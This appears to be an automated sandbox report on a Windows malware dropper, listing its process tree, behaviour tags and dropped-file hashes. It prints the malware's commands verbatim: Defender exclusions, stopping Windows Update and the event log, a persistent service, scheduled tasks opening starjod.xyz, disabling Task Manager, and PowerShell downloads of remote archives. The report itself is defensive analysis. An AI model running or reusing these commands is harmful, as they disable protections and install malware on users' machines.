legs.exe RegAsm.exe PID 3748 wrote to memory of 3128 3748 legs.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe"C:\Users\Admin\AppData\Local\Temp\79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=125.0.2535.92 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x360,0x7ff8e1bf4ef8,0x7ff8e1bf4f04,0x7ff8e1bf4f105⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2680,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1912,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=2896 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2156,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3428,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3464 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3440,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3756,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=4044 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=5236,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5056,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=3424,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --field-trial-handle=5972,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5992 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --field-trial-handle=5972,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5992 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --field-trial-handle=5988,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --field-trial-handle=6404,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=6412 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6296,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=6428 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=6048,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=6528,i,5084088182065800479,8335595050517660856,262144 --variations-seed-version --mojo-platform-channel-handle=5804 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 3526⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"6⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ins.bat4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:007⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 000000017⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "Cleaner"5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 2444⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4608,i,1305347165619645738,15927664461101562802,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:81⤵
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2752 -ip 27521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3748 -ip 37481⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\125.0.2535.92\elevation_service.exe"1⤵
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Corporation.zipFilesize
16.3MB
MD59cb5edb138b8df3492c0b14b56d617ac
SHA1b02dfae970d31251d2f94cf14328f757ceb45c98
SHA256de8c63974461298010c9b9c8a97e769f72f271e976bdbb54dee45264f8a0eda8
SHA51250306f663098471c9aa51d9024bce4b8a25baec2fab2424909b481a4d223feda5311111831eb9084115686782c0c831f81ef5ccdb32b7a6833ff811ff51d4929
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
280B
MD566a163fc723cc32c0075f141523c1285
SHA1c531ffba997084a5230d2abd8823f980bffd3f53
SHA256f5b3825db0d8bdd4a1cd696fbaa6b730ad0b9f2cca5ab752a69b4376a33646dd
SHA51212c3df079dd8f58b907733bcff4d44e90f43e68fc54cefe040300c8027d5b754f197351c012b3b424cb5b9ffd26ade4a8fa645f804d28610526de19dada8bc3f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
312B
MD595158738985aabe787398318f7f4d84b
SHA106db496771aada0f05fb3603a2a0814ab2e04658
SHA256572143aab44c638d787ffe98f8d98897b82af6052ef78116e9a470e5fe27230b
SHA512e3dcd722e08dac7b003cbd0a5264207876b2c35a8af05e776a258ce30cd6db925cc0bb74815dd1ced6619ac496d18c710a489f3d33e4793c1e89741fe7b4a263
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.jsonFilesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD549c7f1f3b1b8d9c5fb062cec75ea967f
SHA10b38bb8478cfb5d2080865f3e4331f694b439300
SHA2560d3ee3a39c5749076da564f2b4ff359a326e4bed0bc230e91d9dbc7b42465b6b
SHA51228b9a48a88f7f177ab6a58c0552936557102bf23bf74f8679ffba23b16eac6dc5a3a4be4ccf1fdb99abaa337b7041a6c177e15b4c2c6ffb8e47bfc7acba54062
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch DictionariesFilesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurityFilesize
858B
MD5b115c6bcbee6968ac5d4ee33b33f7478
SHA1306ce86717e076bb5903f6352e29b4507f5c5fed
SHA256bca937bfae1f3ee3877a3d785149709ae7729342ad5b5948b6e11892b092f3c9
SHA51258be8ec338341720750950637922981e567136ac66a9db1b048efb1d266efeb982a9011336bd7b074184dd3101ea5563a4c1701ef3b29a705e60cc092789bc51
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
10KB
MD556da9c49df03d4eae2518362ef19ea0f
SHA19d227c178a281f1106e140a86b1bca923225e4be
SHA256be61fa3ceb288001e61209412221d4c03caa14f55cc758d839e3487b4333d8e1
SHA51288f7feeb267d404395dc75d06eaab7060e600db5aa43c57f042094af453a315257c83b796d2e0af3f7cdba9aafe3f16285afadbb9a8f4e0d23c5821718f7b4cc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
30KB
MD55ed42af437d9fff698e970f75d433aa3
SHA1bbf24ffb8ac3ce35f793d34bdc23e54486079087
SHA256fc53b43676ca94d1bf638b8834e0e90b05685c4f8a196f45ed3550dd8256b8a1
SHA5129a7f251f0debf9923a768a766c54c9211ca3ab3ed27038e217aaa02ec6f5ad8c392d9cb174617725e4e7f5dd9d32896f6baf066657f38245228f668cb2bb7962
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
48KB
MD521c3106af64247f1bf36e6ae2cdbde5e
SHA1c6545da918ee7cdee496e9f33dd95b035b741370
SHA256d101bb12e3c99c70d8b9810f777d06a289812d20106e94735c277e6241909eeb
SHA5127c29fea3abd4391e4f92358d212f5646c033381ce431ee9c1f950ca250563676ca129ac3d28d322b515f2688313b94c7f41915aced5f4b6ef2c9276d7ef54cfd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
38KB
MD509a3cd73a072f9da25e25f61802b2fa6
SHA149ef87a2294e24227e9878663ec4a14a0abfb06b
SHA2565dcc12a64f14dfea11abfff6a2d89c9233c29dd2206af1dd09e7fb94e55eb0be
SHA512b6ff183ad185a8a272f9084bc7e36704d045a3cb8a3621b9e02711e8a359136ee41057b9b8f812b4930373e2a63879122487adf1d0979a9aaf9ccdd7c132677e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCacheFilesize
9B
MD5b6f7a6b03164d4bf8e3531a5cf721d30
SHA1a2134120d4712c7c629cdceef9de6d6e48ca13fa
SHA2563d6f3f8f1456d7ce78dd9dfa8187318b38e731a658e513f561ee178766e74d39
SHA5124b473f45a5d45d420483ea1d9e93047794884f26781bbfe5370a554d260e80ad462e7eeb74d16025774935c3a80cbb2fd1293941ee3d7b64045b791b365f2b63
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbresFilesize
2KB
MD58f76e0ebafd0cc5e688f0831a4de0908
SHA169cae5a623a98875cfa61ec6e00a4e81ef4de4cf
SHA256b533831825cb3a2a4f81823a546494cdad4dcae1121804b10c12dca9f0251a93
SHA512d802fa596a9abc4e086f86298c9f7c963782c1807af83bf5cf2b6dd79917fa3363380d52cf900e40e0e5797246c4bc8e9e3fe94f1194c0411383886c3acbfeb2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
